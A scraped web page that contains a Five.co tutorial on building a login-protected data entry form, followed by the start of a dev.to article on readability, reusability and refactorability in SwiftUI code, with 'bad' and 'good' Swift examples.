.eb-toc-1ryql.eb-toc-container .eb-toc-title{\n\t\t\t \n \n\n \n\t\t\t \n \n \n \n \n\t\t }\n\n\t\t .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper{\n\t\t\t \n \n\n \n\t\t }\n\n\t\t .eb-toc-1ryql.eb-toc-container .eb-toc-wrapper li{\n\t\t\t \n \n \n \n \n\t\t }\n\n .eb-toc-1ryql.eb-toc-container.style-1 .eb-toc__list-wrap \u003e .eb-toc__list li .eb-toc__list{\n \n \n \n\n \n\n \n \n \n\n \n \n \n }\n\n\t \n\t "},"headers":[{"level":2,"content":"Build a Data Entry System In 3 Steps","text":"Build a Data Entry System In 3 Steps","link":"build-a-data-entry-system-in-3-steps"},{"level":3,"content":"What is a Data Entry System?","text":"What is a Data Entry System?","link":"what-is-a-data-entry-system"},{"level":2,"content":"Essential Components of a Data Entry System:","text":"Essential Components of a Data Entry System:","link":"essential-components-of-a-data-entry-system"},{"level":3,"content":"Building a Data Entry System with Five:","text":"Building a Data Entry System with Five:","link":"building-a-data-entry-system-with-five"},{"level":2,"content":"Step-by-Step Guide to Building a Data Entry System","text":"Step-by-Step Guide to Building a Data Entry System","link":"step-by-step-guide-to-building-a-data-entry-system"},{"level":3,"content":"Step 1: Setting Up the Database for Your Data Entry System","text":"Step 1: Setting Up the Database for Your Data Entry System","link":"step-1-setting-up-the-database-for-your-data-entry-system"},{"level":4,"content":"Create a New Application:","text":"Create a New Application:","link":"create-a-new-application"},{"level":4,"content":"Create Database Tables:","text":"Create Database Tables:","link":"create-database-tables"},{"level":3,"content":"Step 2: Designing the Data Entry Form","text":"Step 2: Designing the Data Entry Form","link":"step-2-designing-the-data-entry-form"},{"level":4,"content":"Select Data Source:","text":"Select Data Source:","link":"select-data-source"},{"level":4,"content":"Create the Form:","text":"Create the Form:","link":"create-the-form"},{"level":3,"content":"Step 3: Deploying the Form","text":"Step 3: Deploying the Form","link":"step-3-deploying-the-form"},{"level":4,"content":"Deploy to Development:","text":"Deploy to Development:","link":"deploy-to-development"},{"level":3,"content":"Securing Your Data Entry Form: Logins, Authentication, Permissions","text":"Securing Your Data Entry Form: Logins, Authentication, Permissions","link":"securing-your-data-entry-form-logins-authentication-permissions"},{"level":4,"content":"Add User Roles and Logins:","text":"Add User Roles and Logins:","link":"add-user-roles-and-logins"},{"level":2,"content":"Conclusion: How to Build a Data Entry System","text":"Conclusion: How to Build a Data Entry System","link":"conclusion-how-to-build-a-data-entry-system"}],"deleteHeaderList":[{"label":"Build a Data Entry System In 3 Steps","value":"build-a-data-entry-system-in-3-steps","isDelete":false},{"label":"What is a Data Entry System?","value":"what-is-a-data-entry-system","isDelete":false},{"label":"Essential Components of a Data Entry System:","value":"essential-components-of-a-data-entry-system","isDelete":false},{"label":"Building a Data Entry System with Five:","value":"building-a-data-entry-system-with-five","isDelete":true},{"label":"Step-by-Step Guide to Building a Data Entry System","value":"step-by-step-guide-to-building-a-data-entry-system","isDelete":false},{"label":"Step 1: Setting Up the Database for Your Data Entry System","value":"step-1-setting-up-the-database-for-your-data-entry-system","isDelete":false},{"label":"Create a New Application:","value":"create-a-new-application","isDelete":false},{"label":"Create Database Tables:","value":"create-database-tables","isDelete":false},{"label":"Step 2: Designing the Data Entry Form","value":"step-2-designing-the-data-entry-form","isDelete":false},{"label":"Select Data Source:","value":"select-data-source","isDelete":false},{"label":"Create the Form:","value":"create-the-form","isDelete":false},{"label":"Step 3: Deploying the Form","value":"step-3-deploying-the-form","isDelete":false},{"label":"Deploy to Development:","value":"deploy-to-development","isDelete":false},{"label":"Securing Your Data Entry Form: Logins, Authentication, Permissions","value":"securing-your-data-entry-form-logins-authentication-permissions","isDelete":false},{"label":"Add User Roles and Logins:","value":"add-user-roles-and-logins","isDelete":false},{"label":"Conclusion: How to Build a Data Entry System","value":"conclusion-how-to-build-a-data-entry-system","isDelete":false}],"isMigrated":true,"titleBg":"rgba(69,136,216,1)","titleColor":"rgba(255,255,255,1)","contentBg":"rgba(241,235,218,1)","contentColor":"rgba(0,21,36,1)","contentGap":8,"titleAlign":"center","titleFontSize":22,"titleFontWeight":"normal","titleLineHeightUnit":"px","contentFontWeight":"normal","contentLineHeight":1.4,"ttlP_isLinked":true,"commonStyles":{"desktop":".wp-admin .eb-parent-eb-toc-1ryql { display:block }.wp-admin .eb-parent-eb-toc-1ryql { filter:unset }.wp-admin .eb-parent-eb-toc-1ryql::before { content:none }.eb-parent-eb-toc-1ryql { display:block }.root-eb-toc-1ryql { position:relative }","tab":".editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-1ryql { display:block }.editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-1ryql { filter:none }.editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-1ryql::before { content:none }.eb-parent-eb-toc-1ryql { display:block }","mobile":".editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-1ryql { display:block }.editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-1ryql { filter:none }.editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-1ryql::before { content:none }.eb-parent-eb-toc-1ryql { display:block }"}} /-->
<!-- wp:separator -->
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<!-- /wp:separator -->
<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">What is a Data Entry System?</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>A data entry system is a platform designed to capture, store, manage, and analyze data. These systems facilitate the collection of vital information for decision-making, research, analysis, and reporting. Data entry systems range from basic <a href="https://www.typeform.com/forms/">online forms</a> to advanced software integrated with databases and analytical tools.</p>
<!-- /wp:paragraph -->
<!-- wp:separator -->
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<!-- /wp:separator -->
<!-- wp:heading -->
<h2 class="wp-block-heading">Essential Components of a Data Entry System:</h2>
<!-- /wp:heading -->
<!-- wp:list -->
<ul><!-- wp:list-item -->
<li><strong>Online Forms:</strong> Forms on the web that users complete to submit their data.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li><strong>Databases:</strong> Systems like <a href="https://five.co/blog/what-is-mysql/">MySQL</a>, PostgreSQL, or MongoDB that organize and store the entered data.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li><strong>Data Security:</strong> Measures to protect data from unauthorized access and breaches.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li><strong>Analytics Tools:</strong> Software to query databases, generate <a href="https://five.co/blog/generate-mysql-pdf-report/">reports</a>, and visualize data.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li><strong>Dashboards:</strong> Interactive interfaces providing real-time insights and trends.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<!-- wp:separator -->
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<!-- /wp:separator -->
<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">Building a Data Entry System with Five:</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>Creating a data entry application in Five provides numerous benefits over traditional form builders, especially for those requiring robust, secure, and analyzable data.</p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>One of the standout features of Five is the ability to create login-protected forms. This feature ensures that only authorized users can access and submit data, significantly enhancing the security of your data entry system. Traditional form builders often lack such advanced security features, potentially exposing your data to unauthorized access.</p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>Moreover, Five allows you to connect your data entry system directly to a database. This connection means you can query the database and generate visual representations of the data, making it easier to identify trends, patterns, and correlations. In contrast, most traditional form builders typically require exporting data to third-party tools for analysis, meaning additional steps and potential errors.</p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>Data entry systems built with Five are designed for professional-grade data entry, making them ideal for extensive surveys, research projects, or feedback analysis.</p>
<!-- /wp:paragraph -->
<!-- wp:separator -->
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<!-- /wp:separator -->
<!-- wp:heading -->
<h2 class="wp-block-heading">Step-by-Step Guide to Building a Data Entry System</h2>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>To follow this tutorial on building a data entry system, <a href="https://five.co/get-started/">sign up for free access to Five.</a></p>
<!-- /wp:paragraph -->
<!-- wp:tadv/classic-paragraph -->
<div style="background-color: #001524;"><hr style="height: 5px;" />
<pre style="text-align: center; overflow: hidden; white-space: pre-line;"><span style="color: #f1ebda; background-color: #4588d8; font-size: calc(18px + 0.390625vw);"><strong>Build a Data Entry Application<br /></strong><span style="font-size: 14pt;">Check out Five's online data entry</span></span></pre>
<p style="text-align: center;"><a href="https://five.co/get-started/" target="_blank" rel="noopener"><button style="background-color: #f8b92b; border: none; color: black; padding: 20px; text-align: center; text-decoration: none; display: inline-block; font-size: 18px; cursor: pointer; margin: 4px 2px; border-radius: 5px;"><strong>Get Instant Access</strong></button><br /></a></p>
<hr style="height: 5px;" /></div>
<!-- /wp:tadv/classic-paragraph -->
<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">Step 1: Setting Up the Database for Your Data Entry System</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p><strong>Start with Five's Data Entry Platform</strong></p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>To begin, sign up for free access to Five and create a new application by navigating to the "Applications" section and clicking the yellow plus button.</p>
<!-- /wp:paragraph -->
<!-- wp:heading {"level":4} -->
<h4 class="wp-block-heading">Create a New Application:</h4>
<!-- /wp:heading -->
<!-- wp:list -->
<ul><!-- wp:list-item -->
<li>Click the yellow plus button.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Name your application (e.g., My First App or Data Entry Form).</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Confirm by clicking the check icon in the upper right corner.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<!-- wp:image {"align":"center","id":3271,"sizeSlug":"full","linkDestination":"none"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Yellow-Plus-Button-Create-a-New-Application-1024x649-1-1.png" alt="" class="wp-image-3271"/></figure>
<!-- /wp:image -->
<!-- wp:list -->
<ul><!-- wp:list-item -->
<li>Click the blue "Manage" button to enter the development environment.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<!-- wp:image {"align":"center","id":3272,"sizeSlug":"full","linkDestination":"none"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Manage-Your-Application-1024x576-1-1.png" alt="" class="wp-image-3272"/></figure>
<!-- /wp:image -->
<!-- wp:heading {"level":4} -->
<h4 class="wp-block-heading">Create Database Tables:</h4>
<!-- /wp:heading -->
<!-- wp:list -->
<ul><!-- wp:list-item -->
<li>Go to <code>Data > Table Wizard</code>, a point-and-click interface for creating database tables.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<!-- wp:image {"align":"center","id":3273,"sizeSlug":"full","linkDestination":"none"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Table-Wizard-1024x649-1-1-1.png" alt="" class="wp-image-3273"/></figure>
<!-- /wp:image -->
<!-- wp:list -->
<ul><!-- wp:list-item -->
<li>Name your table.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Add fields to your table using the plus button, specifying the data types (e.g., text, integer, float).</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Choose appropriate data and display types to ensure your data is stored and displayed correctly. For example, use <code>Float.2</code> for prices with two decimal places.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Save your table by clicking the check icon in the upper right corner. Your MySQL database table is now ready to store data.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<!-- wp:image {"align":"center","id":3274,"sizeSlug":"full","linkDestination":"none"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Excel-to-Web-App-Database-Fields-1024x626-1-1-1.png" alt="" class="wp-image-3274"/></figure>
<!-- /wp:image -->
<!-- wp:separator -->
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<!-- /wp:separator -->
<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">Step 2: Designing the Data Entry Form</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>Next, navigate to <code>Visual > Form Wizard</code> in Five.</p>
<!-- /wp:paragraph -->
<!-- wp:heading {"level":4} -->
<h4 class="wp-block-heading">Select Data Source:</h4>
<!-- /wp:heading -->
<!-- wp:list {"ordered":true} -->
<ol><!-- wp:list-item -->
<li>In the Form Wizard’s General section, select the database table you created as the <strong>main data source.</strong></li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>This links your backend (database) with your frontend (form).</li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->
<!-- wp:image {"align":"center","id":3275,"sizeSlug":"full","linkDestination":"none"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Form-Wizard-Creating-a-form-1024x656-4-1.png" alt="" class="wp-image-3275"/></figure>
<!-- /wp:image -->
<!-- wp:heading {"level":4} -->
<h4 class="wp-block-heading">Create the Form:</h4>
<!-- /wp:heading -->
<!-- wp:list {"ordered":true} -->
<ol><!-- wp:list-item -->
<li>Click the check icon in the upper right corner to finalize the form creation.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Your form is now complete and connected to your database.</li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->
<!-- wp:separator -->
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<!-- /wp:separator -->
<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">Step 3: Deploying the Form</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>To deploy your form:</p>
<!-- /wp:paragraph -->
<!-- wp:heading {"level":4} -->
<h4 class="wp-block-heading">Deploy to Development:</h4>
<!-- /wp:heading -->
<!-- wp:list {"ordered":true} -->
<ol><!-- wp:list-item -->
<li>Click the “Deploy to Development” button in the top right corner. This opens your app in a new browser tab.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Your prototype data entry app is now live. To enhance it, consider adding <a href="http://five.co/themes">themes</a> or additional features.</li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->
<!-- wp:separator -->
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<!-- /wp:separator -->
<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">Securing Your Data Entry Form: Logins, Authentication, Permissions</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>Five allows you to quickly build secure online data entry systems with user roles and permissions.</p>
<!-- /wp:paragraph -->
<!-- wp:heading {"level":4} -->
<h4 class="wp-block-heading">Add User Roles and Logins:</h4>
<!-- /wp:heading -->
<!-- wp:list {"ordered":true} -->
<ol><!-- wp:list-item -->
<li>Turn your application into a <a href="https://help.five.org/2.5/docs/applications/adding-managing-applications/">multi-user app</a>, automatically adding a login screen.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Create user roles with specific permissions. For instance, one role can submit forms while another can view a dashboard summarizing form responses.</li>
<!-- /wp:list-item -->
<!-- wp:list-item -->
<li>Explore Five’s documentation for more detailed instructions on setting up user roles and permissions.</li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->
<!-- wp:paragraph -->
<p>By following these steps, you can create a robust, secure, and efficient data entry system using Five’s rapid application development environment.</p>
<!-- /wp:paragraph -->
<!-- wp:separator -->
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<!-- /wp:separator -->
<!-- wp:heading -->
<h2 class="wp-block-heading">Conclusion: How to Build a Data Entry System</h2>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>Building a data entry system with Five’s rapid application development environment offers numerous advantages over traditional form builders. The process involves three key steps: creating the database, designing the form, and launching the web form. Five provides security features, including login protection, authentication, and permissions, ensuring that your data entry system is secure and only accessible to authorized users.</p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>By using Five, you can directly connect your data entry system to a database, enabling efficient data management and real-time analysis through custom charts and visual representations. This capability allows you to easily identify trends, patterns, and correlations, which is often cumbersome and error-prone with traditional form builders that require exporting data to third-party tools.</p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>With Five, you can improve your data entry process, improve data security, and use analytical tools to gain insights, making it the superior choice for building a comprehensive and efficient data entry system.</p>
<!-- /wp:paragraph --> | domfive |
1,917,978 | 3 Rs of Software Architecture for iOS based in SwiftUI | Software Architecture After over 50 years of software engineering, we still haven't... | 0 | 2024-07-10T02:33:58 | https://dev.to/maatheusgois/3-rs-of-software-architecture-for-ios-based-in-swiftui-c6j | ios, refactoring, swiftui, cleancode | ## Software Architecture
After over 50 years of software engineering, we still haven't settled on a precise definition of software architecture. It remains the art within computer science, persistently evading our efforts to pin it down. Nevertheless, its importance to the industry and applications is undeniable.
Despite this lack of consensus, numerous definitions bring us closer to formalizing software architecture. One of the most notable comes from the IEEE:
>"Architecture is the fundamental organization of a system embodied in its components, their relationships to each other, and to the environment, and the principles guiding its design and evolution." [IEEE 1471]
While this definition and others clarify the elements that constitute architecture, they don't provide a mental model for developing applications. This project aims to fill that gap. By focusing on three key "ilities"—readability, reusability, and refactorability—we can create a hierarchy of architectural attributes that offers a framework for thinking about system code and architecture. It won't provide a ready-made architecture, but it will guide you in determining what architecture works best for your iOS application.
## What is This Project?
This project serves as a guide to analyze three key "ilities" of software architecture—readability, reusability, and refactorability—and demonstrates how hierarchical thinking about these concepts can lead to better code. It is designed for developers of all skill levels, though beginners may find it particularly beneficial.
We will explore a simple `Shopping Cart` application written in Swift, utilizing the SwiftUI framework. Swift and SwiftUI are popular choices among both newcomers and seasoned developers, making them an excellent common language for discussing code quality.
Our application will be developed incrementally, with "Bad" vs. "Good" versions compared at each step within the 3R hierarchy. You can find all the code in the `Example` directory, along with instructions on how to build and develop the application at the end of this README.
It's important to note that this project is not the definitive way to approach software architecture, nor does it provide a complete architecture. However, it offers guidance to help shape your thinking, as it has shaped mine.
Without further ado, let's get started!
## 1. Readability
Readability is the simplest measure of code quality and the easiest to address. It is the first thing you notice when you open a piece of code and generally includes:
- Formatting
- Variable names
- Function names
- Number of function arguments
- Function length (number of lines)
- Nesting levels
These aren't the only factors, but they are immediate red flags. Fortunately, there are a few straightforward rules to follow to fix issues related to these aspects:
- **Invest in an automatic formatter:** Find one that your team agrees on and integrate it into your build process. Formatting arguments during code reviews waste time and money. In this project, we will use [SwiftFormat](https://github.com/nicklockwood/SwiftFormat).
- **Use meaningful and pronounceable variable/function names:** Code is for people, and only incidentally for computers. Naming is the most significant way to communicate the meaning behind your code.
- **Limit function arguments to between 1-3:** Zero arguments imply you're mutating state or relying on state from somewhere other than the caller. More than three arguments make the code hard to read and refactor due to the numerous paths the function can take.
- **Function length:** There is no set limit of lines for a function, as this depends on the language you're coding in. However, a function should do ONE thing and ONE thing only. For example, a function calculating an item's price after taxes should not also connect to a database, look up the item, and get the tax data. Long functions usually indicate that too much is happening.
- **Limit nesting levels:** More than two levels of nesting can imply poor performance (especially in loops) and can be hard to read in long conditionals. Consider extracting nested logic into separate functions.
Now, let's take a look at the first piece of our `Shopping Cart` application to see what poor readability looks like:
```swift
// Example/BadCode/BadCode/Readability/InventoryView.swift
import SwiftUI
struct invView: View{
private let c = "$" // currency
@State private var _i = [ // inventory
1: invItem(pdt: "Flashlight", img: "placeholder",
desc: "A really great flashlight", price: 100, c: "usd"),
2: invItem(pdt: "Tin can", img: "placeholder",
desc: "Pretty much what you would expect from a tin can", price: 32, c: "usd"),
3: invItem(pdt: "Cardboard Box", img: "placeholder",
desc: "It holds things", price: 5, c: "usd")
]
var body:some View {
List {
ForEach(_i.keys.sorted(), id: \.self) { key in
let i = self._i[key]!
HStack {
Image(i.img)
.resizable().frame(width: 50, height: 50)
VStack(alignment: .leading) {
Text(i.pdt).bold()
Text(i.desc)
}
Spacer()
Text(
"\(c) \(i.price)"
)
}
}}.listStyle(PlainListStyle())
}
}
// InventoryItem model
struct invItem {
var pdt: String ,img: String, desc: String
var price: Int
var c: String
}
```
There are a number of problems we can see right away:
* Inconsistent and unpleasant formatting
* Poorly named variables
* Disorganized data structures (inventory using a dictionary)
* Comments that are either unnecessary or serve the job of what a good variable name would
* Hardcoded values (currency symbol)
* Improper model definition (invItem should conform to Identifiable)
* Redundant code (currency property in invItem not used)
* Unnecessary forced unwrapping
* Improper list style selection
Let's take a look at how we could improve it:
```swift
// Example/GoodCode/GoodCode/Readability/Readability.InventoryView.swift
import SwiftUI
struct InventoryView: View {
@State private var inventory = [
InventoryItem(
id: 0,
product: "Flashlight",
image: "placeholder",
description: "A really great flashlight",
price: 100,
currency: .usd
),
InventoryItem(
id: 1,
product: "Tin can",
image: "placeholder",
description: "Pretty much what you would expect from a tin can",
price: 32,
currency: .usd
),
InventoryItem(
id: 2,
product: "Cardboard Box",
image: "placeholder",
description: "It holds things",
price: 5,
currency: .usd
)
]
var body: some View {
List {
ForEach(inventory) { item in
HStack {
Image(item.image)
.resizable()
.frame(width: 50, height: 50)
VStack(alignment: .leading) {
Text(item.product)
.font(.headline)
Text(item.description)
.foregroundColor(.gray)
}
Spacer()
Text(item.priceFormatted)
.font(.headline)
.foregroundColor(.blue)
}
}
}
.listStyle(PlainListStyle())
}
}
struct InventoryItem: Identifiable {
var id: Int
var product: String
var image: String
var description: String
var price: Int
var currency: Currency
var priceFormatted: String {
"\(currency.symbol) \(price)"
}
}
enum Currency {
case usd
var symbol: String {
switch self {
case .usd:
return "$"
}
}
}
```
This improved code now exhibits the following features:
* It is consistently formatted using the automatic formatter [SwiftFormat](https://github.com/nicklockwood/SwiftFormat)
* Names are much more descriptive
* Data structures are properly organized.
* Comments are no longer needed because good naming serves to clarify the meaning of the code. Comments are needed when business logic is complex and when documentation is required.
Too see more code improvements based on SOLID read: [clean-code-swift](https://github.com/MaatheusGois/clean-code-swift)
## 2. Reusability
Reusability is the sole reason you are able to read this code, communicate with strangers online, and even program at all. Reusability allows us to express new ideas with little pieces of the past.
That is why reusability is such an essential concept that should guide your software architecture. We commonly think of reusability in terms of DRY (Don't Repeat Yourself). That is one aspect of it -- don't have duplicate code if you can abstract it properly. Reusability goes beyond that though. It's about making clean, simple APIs that make your fellow progammer say, "Yep, I know exactly what that does!" Reusability makes your code a delight to work with, and it means you can ship features faster.
We will look at our previous example and expand upon it by adding a `Currency Converter` to handle our inventory's pricing in multiple countries:
```swift
// Example/GoodCode/GoodCode/Reusability/InventoryViewWithChoice.swift
import SwiftUI
struct InventoryViewWithChoice: View {
@State private var localCurrency = Currency.usd
@State private var inventory = [
InventoryItem(
id: 0,
product: "Flashlight",
image: "placeholder",
description: "A really great flashlight",
price: 100,
currency: .usd
),
InventoryItem(
id: 1,
product: "Tin can",
image: "placeholder",
description: "Pretty much what you would expect from a tin can",
price: 32,
currency: .usd
),
InventoryItem(
id: 2,
product: "Cardboard Box",
image: "placeholder",
description: "It holds things",
price: 5,
currency: .usd
)
]
private let currencyConversions: [Currency: [Currency: Double]] = [
.usd: [.usd: 1.0, .rupee: 66.78, .yuan: 6.87],
.rupee: [.usd: 1/66.78, .rupee: 1.0, .yuan: 0.107],
.yuan: [.usd: 1/6.87, .rupee: 9.35, .yuan: 1.0]
]
var body: some View {
VStack(alignment: .leading) {
Text("Inventory")
.font(.title)
.padding()
Picker("Currency", selection: $localCurrency) {
ForEach(Currency.allCases, id: \.self) { currency in
Text(currency.name).tag(currency)
}
}
.pickerStyle(SegmentedPickerStyle())
.padding(.horizontal)
List(inventory) { item in
HStack {
Image(item.image)
.resizable()
.frame(width: 50, height: 50)
VStack(alignment: .leading) {
Text(item.product)
.font(.headline)
Text(item.description)
.font(.caption)
.foregroundColor(.gray)
}
Spacer()
Text(
convertCurrency(
price: item.price,
fromCurrency: item.currency,
toCurrency: localCurrency
)
)
.font(.headline)
.foregroundColor(.blue)
}
}
.listStyle(PlainListStyle())
}
}
private func convertCurrency(
price: Int,
fromCurrency: Currency,
toCurrency: Currency
) -> String {
let convertedAmount = Double(price) * currencyConversions[fromCurrency]![toCurrency]!
return "\(toCurrency.symbol)\(String(format: "%.2f", convertedAmount))"
}
}
struct InventoryItem: Identifiable {
var id: Int
var product: String
var image: String
var description: String
var price: Int
var currency: Currency
var priceFormatted: String {
"\(currency.symbol) \(price)"
}
}
enum Currency: CaseIterable {
case usd
case rupee
case yuan
var name: String {
switch self {
case .usd:
return "USD"
case .rupee:
return "Rupee"
case .yuan:
return "Yuan"
}
}
var symbol: String {
switch self {
case .usd:
return "$"
case .rupee:
return "₹"
case .yuan:
return "元"
}
}
}
```
This code works, but merely working is not the point of code. That's why we need to look at this with a stronger lens than just analyzing if it works and it's readable. We have to look if it's reusable. Do you notice any issues?
Think about it!
Alright, there are 3 main issues in the code above:
* The Currency Selector is coupled to the Inventory component
* The Currency Converter is coupled to the Inventory component
* The Inventory data is defined explicitly in the Inventory component and this isn't provided to the component in an API.
Every function and module should just do one thing, otherwise it can be very difficult to figure out what is going on when you look at the source code. The Inventory component should just be for displaying an inventory, not converting and selecting currencies. The benefit of making modules and functions do one thing is that they are easier to test and they are easier to reuse. If we wanted to use our Currency Converter in another part of the application, we would have to include the whole Inventory component. That doesn't make sense if we just need to convert currency.
Let's see what this looks like with more reusable components:
```swift
// Example/GoodCode/GoodCode/Reusability/ViewModels/Reusability.CurrencyConverter.swift
import SwiftUI
class CurrencyConverter: ObservableObject {
@Published var localCurrency = Currency.usd
private let currencyConversions: [Currency: [Currency: Double]] = [
.usd: [.usd: 1.0, .rupee: 66.78, .yuan: 6.87],
.rupee: [.usd: 1/66.78, .rupee: 1.0, .yuan: 0.107],
.yuan: [.usd: 1/6.87, .rupee: 9.35, .yuan: 1.0]
]
func convertCurrency(
price: Int,
fromCurrency: Currency
) -> String {
let convertedAmount = Double(price) * currencyConversions[fromCurrency]![localCurrency]!
return "\(localCurrency.symbol)\(String(format: "%.2f", convertedAmount))"
}
}
```
```swift
// Example/GoodCode/GoodCode/Reusability/Views/Readability.CurrencySelector.swift
import SwiftUI
struct CurrencySelector: View {
@Binding var selectedCurrency: Currency
var body: some View {
Picker("Currency", selection: $selectedCurrency) {
ForEach(Currency.allCases, id: \.self) { currency in
Text(currency.name).tag(currency)
}
}
.pickerStyle(SegmentedPickerStyle())
.padding(.horizontal)
}
}
```
```swift
// Example/GoodCode/GoodCode/Reusability/Views/Readability.Inventory.swift
import SwiftUI
struct Inventory: View {
@State private var inventory: [InventoryItem]
@ObservedObject private var currencyConverter: CurrencyConverter
init(inventory: [InventoryItem], currencyConverter: CurrencyConverter) {
self.inventory = inventory
self.currencyConverter = currencyConverter
}
var body: some View {
List(inventory) { item in
HStack {
Image(item.image)
.resizable()
.frame(width: 50, height: 50)
VStack(alignment: .leading) {
Text(item.product)
.font(.headline)
Text(item.description)
.font(.caption)
.foregroundColor(.gray)
}
Spacer()
Text(
currencyConverter.convertCurrency(
price: item.price,
fromCurrency: item.currency
)
)
.font(.headline)
.foregroundColor(.blue)
}
}
.listStyle(PlainListStyle())
}
}
```
```swift
// Example/GoodCode/GoodCode/Reusability/Views/Reusability.InventoryList.swift
import SwiftUI
struct InventoryList: View {
@State private var inventory = [
InventoryItem(
id: 0,
product: "Flashlight",
image: "placeholder",
description: "A really great flashlight",
price: 100,
currency: .usd
),
InventoryItem(
id: 1,
product: "Tin can",
image: "placeholder",
description: "Pretty much what you would expect from a tin can",
price: 32,
currency: .usd
),
InventoryItem(
id: 2,
product: "Cardboard Box",
image: "placeholder",
description: "It holds things",
price: 5,
currency: .usd
)
]
@ObservedObject private var currencyConverter = CurrencyConverter()
var body: some View {
VStack(alignment: .leading) {
Title()
CurrencySelector(selectedCurrency: $currencyConverter.localCurrency)
Inventory(inventory: inventory, currencyConverter: currencyConverter)
}
}
func Title() -> some View {
Text("Inventory")
.font(.title)
.padding()
}
}
```
This code has seen significant improvements. We now have individual modules for currency selection and conversion, and we can provide inventory data to our Inventory component without modifying its source code. This decoupling embodies the Dependency Inversion Principle, a powerful approach to creating reusable code.
However, before diving into making everything reusable, it's crucial to realize that reusability requires a well-designed API. If the API is poorly designed, future updates could harm its users. So, when should code NOT be made reusable?
- If you can't define a good API yet, avoid creating a separate module. Duplication is better than a bad foundation.
- If you don't expect to reuse your function or module in the near future.
## 3. Refactorability
Refactorable code is code you can change without fear. It's code you can deploy on a Friday night and return to on Monday morning without worrying about runtime errors affecting your users.
Refactorability is about the system as a whole, about how your reusable modules connect like LEGO pieces. If changing your `Employee` module breaks your `Reporting` module, you have refactorability issues. Refactorability is the highest level in the 3R hierarchy and the hardest to achieve and maintain. While there will always be issues in any human system, there are strategies to enhance refactorability:
- Isolated side effects
- Tests
- Static types
For large applications, I highly recommend using a statically typed alternative to Swift. Types provide extra confidence beyond what tests can offer. However, types alone aren't enough; you also need to isolate side effects and test your code.
You might wonder what it means to isolate side effects. A _side effect_ occurs when a function or module modifies data outside its own scope. Writing data to a disk, changing a global variable, or printing to the Xcode console are examples of side effects. While side effects are necessary for a program to interact with the outside world, they should be isolated.
Why should we isolate side effects?
- Side effects make code hard to test. If a function's execution modifies data that another function depends on, we can't ensure consistent output from the same input.
- Side effects introduce coupling between otherwise reusable modules. If module A modifies global state that module B depends on, A must run before B.
- Side effects make the system unpredictable. If any function or module can alter the application state, we can't be sure how changes in one module will impact the entire system.
To isolate side effects, centralize the updating of global state within the application.
Now, let's modify our existing code to incorporate a `Shopping Cart`. We'll examine this new code to understand why it is NOT refactorable:
```swift
// Example/BadCode/BadCode/Refactorability/GlobalState.swift
import Foundation
class GlobalState {
static let shared = GlobalState()
var cart: [InventoryItem] = []
}
```
